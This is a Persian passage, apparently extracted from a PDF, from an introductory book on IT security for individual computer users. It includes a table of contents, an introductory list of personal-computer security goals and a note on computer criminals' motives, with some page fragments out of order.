‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ‪ ،‬ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﺎﺭﺕ ﺑﺮﺩﺍﺷﺖ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻮﻗﻌﻴﺖ‬
‫ﺧﺎﺹ ﺷﻤﺎ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ ﻛﻤﻚ ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﺮﺍﺟﻊ‬
‫ﭼﺎﭘﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺍﻭﺍﻧﻲ ﻛﻪ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪﻩ ﺍﺑﻌﺎﺩ ﺧﺎﺹ ﺍﻣﻨﻴﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷـﻜﻞ‬
‫ﺗﺨﺼﺼﻲ ﺑﺮ ﺭﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻤﺮﻛـﺰ‬
‫ﺩﺍﺭﻧﺪ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ‪ .‬ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﻨـﺎﺑﻊ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﭘﻲ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺭ ﺟﻬﺎﻥ‬
‫ﺷﺒﻜﻪﺍﻱ ﻣﻲﺑﺎﺷﻨﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺳﺮﻣﺎﻳﻪ ﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻋﺘﻤـﺎﺩ ﻭ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﺳـﻄﺢ ﺍﻣﻨﻴـﺖ ﻭ‬
‫ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺁﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﺩﻭﻟﺘﻬﺎ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﻫﻤﮕـﻲ ﻧﻘـﺶ ﺑـﺴﺰﺍﻳﻲ ﺩﺭ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳﺮﻣﺎﻳﻪ ﻫﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﺸﻮﺭﻫﺎ‬
‫ﺍﻳﻔﺎ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻨﺎﺧﺖ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺴﻴﺎﺭ ﺳﻮﺩﻣﻨﺪ ﺍﺳﺖ؛ ﻭ ﻋﻤﻠﻜﺮﺩ‬
‫ﻣﻨﺎﺳﺐ ﺑﺮ ﺍﺳﺎﺱ ﭼﻨﻴﻦ ﺷﻨﺎﺧﺘﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺎﻛﻨﺎﻥ ﻛﺮﺓ ﺯﻣﻴﻦ ﺗـﺎ ﺳـﺮﺣﺪ‬
‫ﺍﻣﻜﺎﻥ ﻓﻮﺍﻳﺪ ﻋﺼﺮ ﻧﻮﻳﻦ ﺩﻳﺠﻴﺘﺎﻝ ﺭﺍ ﺣﺲ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪ ﻭ ﻣﻬﻴﺠﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨـﺪ‬
‫ﻛﻪ ﻫﺮﻳﻚ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺁﻣﻮﺯﺵ‪ ،‬ﺑﻬﺪﺍﺷﺖ‪ ،‬ﺭﻓـﺎﻩ‪،‬‬
‫ﺗﺠﺎﺭﺕ ﻭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﺔ ﻣﺪﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪٤٣‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ‬
‫ﻓﺼﻞ ‪ .۲‬ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﱵ‬
‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ‬
‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬
‫ﻓﺼﻞ ‪ .۵‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﳐﺮﺏ‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ‬
‫ﻓﺼﻞ ‪ .۷‬ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ‬
‫ﻓﺼﻞ ‪ .۸‬ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ‬
‫ﺿﻤﻴﻤﻪ‪ .۱‬ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺿﻤﻴﻤﻪ‪.۲‬‬
‫‪TCP/IP‬‬
‫ﺿﻤﻴﻤﻪ‪ .۳‬ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ﻓﲏ‬
‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﺗﺄﻛﻴﺪ ﺑﺨﺶ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺍﺳﺖ ‪ -‬ﺍﺯ ﻣﺒﺘﺪﻳﺎﻥ ﮔﺮﻓﺘﻪ ﺗﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ؛ ﻭ ﺍﻭﻟﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻛﻪ‬
‫ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺑﺎﻳــﺪ ﺷــﺮﺡ ﺩﺍﺩﻩ ﺷــﻮﺩ ﭼﮕــﻮﻧﮕﻲ ﺣﻔﺎﻇــﺖ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺳﺖ‪.‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ؛ ﻭﻟـﻲ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺯﻳﺮﻛﻲ ﻭ ﻣﺮﺍﻗﺒﺖ ﺷﺪﻳﺪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺯﺑﺎﻥ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺩﺭ‬
‫ﺍﻳﻦ ﺑﺤﺚ ﺑﻌﻀﹰﺎ ﺣﺎﻭﻱ ﻣﻔﺎﻫﻴﻢ ﻧﺎﻣﺄﻧﻮﺳﻲ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺍﺻﻄﻼﺣﺎﺕ ﻭ ﺗﻌﺎﺭﻳﻒ ﺩﺭ ﺿﻤﻴﻤﺔ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ﺁﻣﺪﻩﺍﻧـﺪ ﻭ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺰ ﺩﺭ ﭘﻴﻮﺳﺖ ‪ ۱‬ﻛﺘﺎﺏ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻃﺮﺡ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﺭﺍﺋﻪ ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ‬
‫ﻣﻔﻬﻮﻡ "ﻛﺎﺭﺑﺮﺩ ﺻﺤﻴﺢ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ "ﺣﻔﺎﻇﺖ" ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﻣﺸﺨﺺ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺷـﻤﺎ ﻧﻴـﺰ ﺑـﺪﻧﺒﺎﻝ ﻫﻤـﻴﻦ ﻣـﺴﺌﻠﻪ ﻫـﺴﺘﻴﺪ‪،‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ‪:‬‬
‫•‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻳـﺎ‬
‫ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺷﻤﺎ ﭼﻨﻴﻦ ﺧﻮﺍﺳﺘﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛‬
‫•‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻃﺮﺍﺡ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺁﻧﺮﺍ‬
‫ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ )ﻣﮕﺮ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪،‬‬
‫ﻛﻪ ﻭﺟﻮﺩ ﺁﻧﻬﺎ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺳﺖ(؛‬
‫•‬
‫ﻫﻴﭽﻜﺲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺭﺍﻳﺎﻧـﻪ ﻭ‬
‫ﺷﺒﻜﺔ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ؛‬
‫•‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺁﻟـﻮﺩﻩ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺭﺍ‬
‫ﻣﻨﺘﺸﺮ ﻧﻤﻲﻛﻨﺪ؛‬
‫•‬
‫ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﺗﻐﻴﻴﺮﺍﺗـﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺍﻳﺠـﺎﺩ‬
‫ﻣﻲﻛﻨﻴﺪ ﻧﻴﺴﺖ؛‬
‫•‬
‫ﻛــﺴﻲ ﺗﻮﺍﻧــﺎﻳﻲ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺩﺍﺩﻩﻫــﺎﻱ ﺷــﻤﺎ‪ ،‬ﭼــﻪ ﺩﺭ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻭ ﭼﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﻧﺪﺍﺭﺩ؛‬
‫•‬
‫ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ ﻳــﺎ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ ﻭﺑــﻲ ﻛــﻪ ﺑــﻪ ﺁﻧﻬــﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻳﺪ ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﺳـﺮﻗﺖ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‪ ١‬ﻭ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‪ ٢‬ﻧﻴﺴﺖ؛‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ‬
‫ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺍﺭﺩ‬
‫ﻛﻨﻴــﺪ‪ ،‬ﺩﺍﺩﻩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺍﺯ ﺍﻣﻨﻴــﺖ ﻛﺎﻣــﻞ ﺑﺮﺧــﻮﺭﺩﺍﺭ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ )ﻣﺴﻠﻤﹰﺎ ﺷﻤﺎ ﺑﺮ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳـﻮﻱ ﺩﻳﮕـﺮ ﺷـﺒﻜﺔ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻨﺘﺮﻟﻲ ﻧﺨﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ(؛‬
‫•‬
‫ﻭ ‪...‬‬
‫ﭼﻨﺎﻧﭽﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ‬
‫ﺷﻮﻧﺪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﻪ ﺑﺎﺭ ﻣـﻲﺁﻳـﺪ‪ :‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ‬
‫ﭘﻴﺎﻣﺪﻫﺎ ﻣﻨﺠﺮ ﺑـﻪ ﺁﺯﺍﺭ ﺷـﺨﺺ ﮔﺮﺩﻧـﺪ ﻭﻟـﻲ ﻫﺰﻳﻨـﻪﺍﻱ ﺩﺭ ﺑـﺮ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺗﺤﻤﻴـﻞ ﻛﻨﻨـﺪ ﻭ ﻭﻗـﺖ‬
‫ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﻫﻨـﺪ‪ .‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻓﺔ ﺷﺨﺺ ﻗﻠﻤﺪﺍﺩ ﻣﻲﺷـﻮﺩ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻣﺸﻜﻞ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺑﻪ ﺧﻄﺮ ﺍﻓﺘﺎﺩﻥ ﻣﻮﻗﻌﻴﺖ ﺷﻐﻠﻲ‬
‫ﻭﻱ ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺣﺘﻤـﺎﻝ‬
‫ﺧﻄﺮ ﺑﭙﺮﺩﺍﺯﺩ ﻭ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺭﺍ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﻭ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ‬
‫ﻧﻤﺎﻳﺪ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺟﺰﺋﻴـﺎﺗﻲ ﻛـﻪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺑﺘـﻮﺍﻥ‬
‫ﺗﻤﺎﻣﻲ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩ‪.‬‬
‫ﭼﻨﺎﻧﭽﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻴـﺰ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ‬
‫ﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺭﺍ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﻭ‬
‫ﺍﺯ ﺟﻬﺎﻥ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﻧﻤﻮﺩ‪.‬‬
‫ﻃﺒﻴﻌﺘﹰﺎ ﺍﺭﺍﺋﻪ ﺗﻤﺎﻣﻲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﺻـﺪﻫﺎ‬
‫ﺻﻔﺤﻪ ﻣﻄﻠﺐ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ‪ ،‬ﺍﻣﺎ ﻣﺨﺎﻃﺒﻴﻦ ﻏﺎﻟﺒﹰﺎ‬
‫ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﻣﻄﺎﻟﻌﻪ ﻣﻄﺎﻟﺐ ﺍﻧﺒﻮﻩ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻧﻮﺷـﺘﻪ‬
‫ﺧﻼﺻــﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﺟﻬــﺖ ﺩﺭﻙ ﻭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻣﺮﺍﺟﻊ ﺫﻛﺮﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﻳﻢ ﺷـﺎﻣﻞ ﻣﻨـﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ‪ ،‬ﻭ ﻣﺴﺘﻨﺪﺍﺕ ﭼﺎﭘﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻛﻤﻜﻬـﺎﻱ‬
‫ﻣﻔﻴﺪﻱ ﺑﺎﺷﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻣﻄﺎﻟﻌﺔ ﺑﻴﺸﺘﺮ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪Username‬‬
‫‪Password‬‬
‫‪1‬‬
‫‪2‬‬
‫‪٤٩‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺗﺠـﺎﺭﻱ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮ ﻧﻮﺷـﺘﻪ‬
‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫•‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﻫﻤﮕﺎﻡ ﺑﺎ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ‬
‫ﻓﻨﺎﻭﺭﻱ‪ ،‬ﮔﺮﻭﻫﻲ ﺍﺯ ﺧﺮﺍﺑﻜـﺎﺭﺍﻥ ﻛـﻪ ﺍﺯ ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺳﻮﺩ ﻣﻲﺑﺮﻧﺪ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩﺍﻧـﺪ‪ .‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ‬
‫ﺍﻳﻨﻜﺎﺭ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﻟﺬﺕ ﻭ ﺳﺮﮔﺮﻣﻲ ﺻﻮﺭﺕ ﻣـﻲﮔﻴـﺮﺩ ﻭ‬
‫ﺑﺮﺧﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺧﻮﺩﻧﻤﺎﻳﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﻭﺳـﺘﺎﻥ‬
‫ﺧﻮﺩ ﺩﺳﺖ ﺑﻪ ﭼﻨﻴﻦ ﻛﺎﺭﻫﺎﻳﻲ ﻣـﻲﺯﻧﻨـﺪ؛ ﺍﻣـﺎ ﺩﺭ ﺑﻌـﻀﻲ‬
‫ﻣــﻮﺍﺭﺩ ﺍﻳﻨﻜــﺎﺭ ﺑــﺮﺍﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﻣﻨــﺎﻓﻊ ﺷﺨــﺼﻲ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﮔﻴﺮﺩ )ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻓﺮﻳﺒﻜﺎﺭﺍﻧﻪ(‪ .‬ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﻣـﺬﻛﻮﺭ ﺍﻳـﻦ‬
‫ﺍﺷﺨﺎﺹ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﺧﺴﺎﺭﺕ ﻭ ﮔﺴﺘﺮﺵ ﺑﻲﺍﻋﺘﻤـﺎﺩﻱ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﺩﺭ ﺣﺪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻣﺸﻜﻼﺕ ﺑﺤﺮﺍﻧـﻲ ﺑﻮﺟـﻮﺩ‬
‫ﻣﻲﺁﻭﺭﻧﺪ ﻛﻪ ﺑﻪ ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺷـﻐﻠﻲ ﺻـﺪﻣﻪ‬
‫ﻭﺍﺭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎﻳﺪ ﮔﻔﺖ ﺍﺯ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻣﻘﻴﺎﺱ‬
‫ﺟﻬﺎﻧﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﺗﻌﻘﻴﺐ ﻭ ﻣﺘﻮﻗـﻒ‬
